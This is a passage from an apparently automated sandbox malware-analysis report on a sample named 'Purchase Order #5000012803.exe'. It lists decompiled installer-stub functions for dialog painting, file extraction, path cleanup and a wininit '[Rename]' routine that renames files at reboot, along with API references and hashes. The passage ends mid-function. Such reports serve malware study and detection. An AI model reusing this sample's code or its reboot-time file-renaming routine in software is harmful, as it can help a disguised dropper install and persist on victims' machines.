				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403E59( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403E6C(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x423eb0 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x41f45c =  *0x41f45c & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x420478 =  *0x420478 & 0x00000000;
				return 0;
			}


















                      0x00403f8f
                      0x004040b5
                      0x00404111
                      0x00404115
                      0x004041ec
                      0x004041ee
                      0x004041ee
                      0x004041f4
                      0x004041f4
                      0x004041f7
                      0x00000000
                      0x004041fe
                      0x00404123
                      0x00404125
                      0x0040412f
                      0x0040413a
                      0x0040413d
                      0x00404140
                      0x0040414b
                      0x0040414e
                      0x00404155
                      0x00404163
                      0x0040417b
                      0x00404183
                      0x0040418e
                      0x0040419e
                      0x004041a0
                      0x004041a0
                      0x00404155
                      0x004041aa
                      0x00000000
                      0x004041b5
                      0x004041b9
                      0x004041ca
                      0x004041ca
                      0x004041d0
                      0x004041de
                      0x004041de
                      0x00000000
                      0x004041e2
                      0x004041aa
                      0x004040c0
                      0x00000000
                      0x004040d4
                      0x004040d4
                      0x004040da
                      0x004040da
                      0x004040e0
                      0x00000000
                      0x00000000
                      0x00404105
                      0x00404107
                      0x0040410c
                      0x00000000
                      0x0040410c
                      0x004040c0
                      0x00403f95
                      0x00403f98
                      0x00403f9d
                      0x00403fae
                      0x00403fae
                      0x00403fb5
                      0x00403fb8
                      0x00403fba
                      0x00403fbf
                      0x00403fc8
                      0x00403fce
                      0x00403fda
                      0x00403fdd
                      0x00403fe6
                      0x00403feb
                      0x00403fee
                      0x00403ff3
                      0x0040400a
                      0x00404011
                      0x00404024
                      0x00404027
                      0x0040403c
                      0x00404043
                      0x00404048
                      0x0040404d
                      0x0040404d
                      0x0040405c
                      0x0040406b
                      0x0040406d
                      0x00404083
                      0x00404092
                      0x00404094
                      0x00000000

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                      • String ID: @.B$N$open
                      • API String ID: 3615053054-3815657624
                      • Opcode ID: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
                      • Instruction ID: c3de460066171d4a99b3db8707b5a70307f179c1ca483427b8a670d92431fbf8
                      • Opcode Fuzzy Hash: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
                      • Instruction Fuzzy Hash: 4E61C3B1A40209BFEB109F60CC45B6A7B69FB54715F108136FB04BA2D1C7B8A951CFA8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                      Download Yara Rule
                      C-Code - Quality: 90%
                      			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423eb0;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x4236a0, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x423ea8;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                      0x0040100a
                      0x00401039
                      0x00401047
                      0x0040104d
                      0x00401051
                      0x0040105b
                      0x00401061
                      0x00401064
                      0x004010f3
                      0x00401089
                      0x0040108c
                      0x004010a6
                      0x004010bd
                      0x004010cc
                      0x004010cf
                      0x004010d5
                      0x004010d9
                      0x004010e4
                      0x004010ed
                      0x004010ef
                      0x004010ef
                      0x00401100
                      0x00401105
                      0x0040110d
                      0x00401110
                      0x00401112
                      0x00401118
                      0x0040111f
                      0x00401126
                      0x00401130
                      0x00401142
                      0x00401156
                      0x00401160
                      0x00401165
                      0x00401165
                      0x00401110
                      0x0040116e
                      0x00000000
                      0x00401178
                      0x00401010
                      0x00401013
                      0x00401015
                      0x0040101f
                      0x0040101f
                      0x00000000

                      APIs
                      • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                      • BeginPaint.USER32(?,?), ref: 00401047
                      • GetClientRect.USER32 ref: 0040105B
                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                      • FillRect.USER32 ref: 004010E4
                      • DeleteObject.GDI32(?), ref: 004010ED
                      • CreateFontIndirectA.GDI32(?), ref: 00401105
                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                      • SelectObject.GDI32(00000000,?), ref: 00401140
                      • DrawTextA.USER32(00000000,004236A0,000000FF,00000010,00000820), ref: 00401156
                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                      • DeleteObject.GDI32(?), ref: 00401165
                      • EndPaint.USER32(?,?), ref: 0040116E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                      • String ID: F
                      • API String ID: 941294808-1304234792
                      • Opcode ID: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                      • Instruction ID: 81477e3a2fde3fb3f26aa953fc06e347994717d76cab2c79682594c458f31f57
                      • Opcode Fuzzy Hash: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                      • Instruction Fuzzy Hash: 8141BC71804249AFCB058FA4CD459BFBFB9FF44314F00802AF551AA1A0C378EA54DFA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004057D3, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144filememoryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 93%
                      			E004057D3() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405DA3(1);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x423f30 =  *0x423f30 + 1;
						return _t20;
					}
				}
				 *0x422628 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x4220a0, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421ca0, "%s=%s\r\n", 0x422628, 0x4220a0);
						_t56 = _t55 + 0x10;
						E00405AA7(_t43, 0x400, 0x4220a0, 0x4220a0,  *((intOrPtr*)( *0x423eb0 + 0x128)));
						_t20 = E0040575C(0x4220a0, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E004056D1(_t51, "[Rename]\r\n") != 0) {
								_t28 = E004056D1(_t26 + 0xa, 0x409348);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E0040571D(_t51 + _t29, 0x421ca0, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405A85(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E0040575C(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x422628, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}





















                      0x004057d9
                      0x004057e0
                      0x004057e4
                      0x004057ed
                      0x004057f1
                      0x00405930
                      0x00405930
                      0x00000000
                      0x00405930
                      0x004057f1
                      0x004057fd
                      0x00405813
                      0x0040583b
                      0x00405846
                      0x0040584a
                      0x0040586a
                      0x00405871
                      0x0040587b
                      0x00405888
                      0x0040588d
                      0x00405892
                      0x00405896
                      0x00000000
                      0x00000000
                      0x004058a5
                      0x004058a7
                      0x004058b4
                      0x004058b8
                      0x00405929
                      0x0040592a
                      0x00000000
                      0x004058d4
                      0x004058e1
                      0x00405946
                      0x0040594d
                      0x004058f4
                      0x004058f4
                      0x004058f6
                      0x004058ff
                      0x0040590a
                      0x0040591c
                      0x00405923
                      0x00000000
                      0x00405923
                      0x0040594f
                      0x00405950
                      0x00405955
                      0x00405957
                      0x00405964
                      0x00405964
                      0x00405968
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00405959
                      0x00405959
                      0x0040595c
                      0x0040595f
                      0x00405960
                      0x00000000
                      0x00405959
                      0x004058ec
                      0x004058f1
                      0x00000000
                      0x004058f1
                      0x004058b8
                      0x00405815
                      0x00405820
                      0x00405829
                      0x0040582d
                      0x00000000
                      0x00000000
                      0x0040582d
                      0x0040593a

                      APIs
                        • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                        • Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                        • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,00405568,?,00000000,000000F1,?), ref: 00405820
                      • GetShortPathNameA.KERNEL32(?,00422628,00000400), ref: 00405829
                      • GetShortPathNameA.KERNEL32(00000000,004220A0,00000400), ref: 00405846
                      • wsprintfA.USER32 ref: 00405864
                      • GetFileSize.KERNEL32(00000000,00000000,004220A0,C0000000,00000004,004220A0,?,?,?,00000000,000000F1,?), ref: 0040589F
                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004058AE
                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004058C4
                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421CA0,00000000,-0000000A,00409348,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040590A
                      • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 0040591C
                      • GlobalFree.KERNEL32 ref: 00405923
                      • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 0040592A
                        • Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
                        • Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                      • String ID: %s=%s$(&B$[Rename]
                      • API String ID: 3772915668-1834469719
                      • Opcode ID: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
                      • Instruction ID: f113039d6a8e0b98787bbcb52898fefdd985450d1919188b96c4478b1d7dfea3
                      • Opcode Fuzzy Hash: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
                      • Instruction Fuzzy Hash: 0F412371A00B11FBD3216B619D48FAB3A5CDB45764F100036FA05F22D2E678A801CEBD
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00405CE3, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00405CE3(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E004055E5(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004055A3("*?|<>/\":", _t5))) == 0) {
							E0040571D(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                      0x00405ce5
                      0x00405ced
                      0x00405d01
                      0x00405d01
                      0x00405d07
                      0x00405d14
                      0x00405d14
                      0x00405d15
                      0x00405d17
                      0x00405d1b
                      0x00405d1d
                      0x00405d26
                      0x00405d28
                      0x00405d42
                      0x00405d4a
                      0x00405d4a
                      0x00405d4f
                      0x00405d51
                      0x00405d53
                      0x00405d57
                      0x00405d58
                      0x00405d5b
                      0x00405d63
                      0x00405d65
                      0x00405d69
                      0x00000000
                      0x00000000
                      0x00405d6f
                      0x00405d74
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00405d74
                      0x00405d79

                      APIs
                      • CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Purchase Order #5000012803.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
                      • CharNextA.USER32(?,?,?,00000000), ref: 00405D48
                      • CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Purchase Order #5000012803.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
                      • CharPrevA.USER32(?,?,"C:\Users\user\Desktop\Purchase Order #5000012803.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: Char$Next$Prev
                      • String ID: "C:\Users\user\Desktop\Purchase Order #5000012803.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                      • API String ID: 589700163-1709115841
                      • Opcode ID: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
                      • Instruction ID: 2efc38d3d3d4567a91e012bcb7a73cc210910fb997772161a70c169f721ad970
                      • Opcode Fuzzy Hash: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
                      • Instruction Fuzzy Hash: 5811E251804B9129EB3226285C48B7B6F89CF97760F18807BE5C1722C2D67C5C429E6D
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00403E9E, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00403E9E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                      0x00403eb0
                      0x00403f44
                      0x00000000
                      0x00403f44
                      0x00403ec1
                      0x00403ec5
                      0x00000000
                      0x00000000
                      0x00403ecb
                      0x00403ed4
                      0x00403ed7
                      0x00403ed7
                      0x00403edd
                      0x00403ee3
                      0x00403ee3
                      0x00403eef
                      0x00403ef5
                      0x00403efc
                      0x00403eff
                      0x00403f02
                      0x00403f04
                      0x00403f04
                      0x00403f0c
                      0x00403f12
                      0x00403f12
                      0x00403f1c
                      0x00403f21
                      0x00403f24
                      0x00403f29
                      0x00403f2c
                      0x00403f2c
                      0x00403f3c
                      0x00403f3c
                      0x00000000

                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                      • String ID:
                      • API String ID: 2320649405-0
                      • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                      • Instruction ID: 00f1469000c5a89127aeec98ef40b5380c975c6b17ce5fce2ee989e1a8c22914
                      • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                      • Instruction Fuzzy Hash: D9216271904745ABCB219F68DD08B5BBFF8AF01715B048A69F895E22E1C738E9048B55
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040266E, Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                      Download Yara Rule
                      C-Code - Quality: 93%
                      			E0040266E(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *(_t58 - 8) = 0xfffffd66;
				_t52 = E004029E8(0xfffffff0);
				 *(_t58 - 0x44) = _t24;
				if(E004055E5(_t52) == 0) {
					E004029E8(0xffffffed);
				}
				E0040573D(_t52);
				_t27 = E0040575C(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x423eb4;
					 *(_t58 - 0x2c) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004031DA(_t47);
						E004031A8(_t51,  *(_t58 - 0x2c));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
						 *(_t58 - 0x30) = _t56;
						if(_t56 != _t47) {
							E00402F01(_t49,  *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x38) =  *_t56;
								E0040571D( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x38);
							}
							GlobalFree( *(_t58 - 0x30));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
						GlobalFree(_t51);
						 *(_t58 - 8) = E00402F01(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *(_t58 - 8) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x44));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











                      0x0040266e
                      0x00402670
                      0x0040267c
                      0x0040267f
                      0x00402689
                      0x0040268d
                      0x0040268d
                      0x00402693
                      0x004026a0
                      0x004026a8
                      0x004026ab
                      0x004026b1
                      0x004026bf
                      0x004026c4
                      0x004026c8
                      0x004026cb
                      0x004026d4
                      0x004026e0
                      0x004026e4
                      0x004026e7
                      0x004026f1
                      0x00402710
                      0x004026f8
                      0x004026fd
                      0x00402705
                      0x00402708
                      0x0040270d
                      0x0040270d
                      0x00402717
                      0x00402717
                      0x00402729
                      0x00402730
                      0x00402742
                      0x00402742
                      0x00402748
                      0x00402748
                      0x00402753
                      0x00402754
                      0x00402758
                      0x0040275c
                      0x00402762
                      0x00402762
                      0x00402769
                      0x00402156
                      0x00402880
                      0x0040288c

                      APIs
                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026C2
                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026DE
                      • GlobalFree.KERNEL32 ref: 00402717
                      • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402729
                      • GlobalFree.KERNEL32 ref: 00402730
                      • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402748
                      • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040275C
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                      • String ID:
                      • API String ID: 3294113728-0
                      • Opcode ID: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
                      • Instruction ID: 9ca9f948efa3d3b3c01768b84b42719a88da944e93008125b7d5b0dd1b363230
                      • Opcode Fuzzy Hash: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
                      • Instruction Fuzzy Hash: 5B318D71C00128BBDF216FA9CD89D9E7E79EF09364F10422AF910772E0D7795D419BA8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00404E23, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00404E23(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423684;
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x423f54;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405AA7(0, _t39, 0x41fc70, 0x41fc70, _a4);
					}
					_t26 = lstrlenA(0x41fc70);
